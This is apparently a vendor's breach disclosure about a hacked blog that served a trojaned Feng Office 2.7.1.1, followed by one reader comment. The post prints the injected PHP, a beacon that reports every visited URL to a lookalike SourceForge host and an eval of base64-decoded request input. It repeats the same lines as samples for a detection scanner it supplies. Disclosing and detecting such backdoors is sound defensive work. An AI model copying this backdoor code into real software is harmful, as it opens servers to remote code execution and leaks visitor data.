
A few weeks ago our blog was hacked with one concrete purpose: to replace the download link for what was then the latest released version.

As a result, some users downloaded an infected copy of Feng Office version 2.7.1.1.

Affected installations

The modified link changed the download destination to a file hosted locally on our site, which served an infected version 2.7.1.1 of the Community Edition.

Installations running a different version, or a 2.7.1.1 downloaded from SourceForge, are not affected.

Recommended Measures

The most effective way to be 100% sure that your installation is clean is to download and update to the latest version.

The attack

The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).

We have since removed all infected files from our website and corrected the Apache settings that allowed the exploit.

The infection was introduced in the files “init.php” and “environment/environment.php”, at line 22. The infected code looks like this:

In init.php:

// Beacon: reports the host and requested URI of every page load to the attacker's server
file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
// Backdoor: executes any base64-encoded PHP supplied in the 'lal' query parameter
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

In environment.php:

if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {
    if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
        session_start(); // Start the session
    }
}
// Beacon: same call-home as in init.php (note the misspelled host name)
file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
include_once ENVIRONMENT_PATH . '/classes/Env.class.php';
...
// Backdoor: same eval of attacker-supplied, base64-encoded PHP as in init.php
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));
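For administrators who want to check an existing 2.7.1.1 installation rather than take the download on trust, the two indicators above (the call-home to raport.php and the eval of base64-decoded request input) are easy to scan for. The following scanner is an added example written for this post; it is not Feng Office code. The sample file contents are constructed from the infected lines quoted above plus one clean file, and the regular expressions are deliberately a little broader than the exact lines shown (they also match $_POST, $_REQUEST and $_COOKIE as the eval source) so that minor variants are caught as well.

```python
import os
import re
from typing import Dict, List

# Indicator 1: request input fed straight into eval(base64_decode(...)).
# The infected files use $_GET['lal']; the pattern also covers the other request arrays.
EVAL_BACKDOOR = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.IGNORECASE
)
# Indicator 2: the beacon that reports every visited URL to raport.php on a remote host.
# The host is not pinned, since the two infected files already use two different spellings.
BEACON = re.compile(
    r"file_get_contents\s*\(\s*['\"]https?://[^'\"]*raport\.php\?site=", re.IGNORECASE
)


def scan_source(path: str, source: str) -> List[Dict[str, object]]:
    """Return one finding per matching line: file path, 1-based line number, indicator name."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if EVAL_BACKDOOR.search(line):
            findings.append({"file": path, "line": lineno, "indicator": "eval_base64_backdoor"})
        if BEACON.search(line):
            findings.append({"file": path, "line": lineno, "indicator": "raport_beacon"})
    return findings


def scan_tree(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan an in-memory mapping of path -> PHP source (used for the constructed samples below)."""
    findings: List[Dict[str, object]] = []
    for path in sorted(files):
        findings.extend(scan_source(path, files[path]))
    return findings


def scan_directory(root: str) -> List[Dict[str, object]]:
    """Walk a real installation directory and scan every .php file it contains."""
    files: Dict[str, str] = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    files[full] = fh.read()
    return scan_tree(files)


# Constructed samples: two files carry the infected lines quoted in the post, one is clean.
SAMPLE_FILES: Dict[str, str] = {
    "init.php": (
        "<?php\n"
        "// constructed sample: infected init.php\n"
        "file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);\n"
        "if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));\n"
    ),
    "environment.php": (
        "<?php\n"
        "// constructed sample: abbreviated infected environment.php\n"
        "if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {\n"
        "    session_start();\n"
        "}\n"
        "file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);\n"
        "include_once ENVIRONMENT_PATH . '/classes/Env.class.php';\n"
        "if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));\n"
    ),
    "config.php": (
        "<?php\n"
        "// constructed sample: clean file; base64_decode on its own is not an indicator\n"
        "$blob = base64_decode($stored_setting);\n"
        "session_start();\n"
    ),
}


if __name__ == "__main__":
    for finding in scan_tree(SAMPLE_FILES):
        print(f"{finding['file']}:{finding['line']}: {finding['indicator']}")
```

Run against the constructed samples, the scanner reports the beacon and the eval backdoor in both infected files and nothing for the clean one. On a live system, `scan_directory("/path/to/fengoffice")` does the same over every PHP file; a clean result is reassuring, but because pattern matching only finds what it is told to look for, comparing the tree against a fresh download from SourceForge (as the post recommends) remains the definitive check.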

We would like to thank the two users who detected the issue and reported it to our team.

We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information; especially if your installation was affected.

Hopefully, we will handle it better if a similar attack happens again.

One Comment

  • Spork Schivago says:

    Could you please tell us how you fixed Apache? If a visitor was allowed to modify your PHP script because of some exploit they found in Apache, I’d like to make sure my website is secure. I don’t really have a website yet. I have a Virtual Private Server through GoDaddy but I’m trying to make sure everything’s secure before I start working on the site. GoDaddy provides a copy of cPanel for me to use and it includes Installatron. Although I haven’t used Installatron (and don’t really plan on using it), I keep getting e-mails talking about how Installatron updated some packages. I’m guessing it’s updating the list of available packages that I can install, because I don’t have any packages installed. Today, I got an e-mail from Installatron saying:
    UPDATED APPS
    concrete 5.7.5.6
    fengoffice 3.4.0.17
    Since Feng Office was one of the updated apps, would I have to worry about Installatron downloading some malicious version of Feng Office that could potentially allow a hacker in? Thanks and keep up the good work of letting your customers know about issues like this, rather than just trying to cover it up!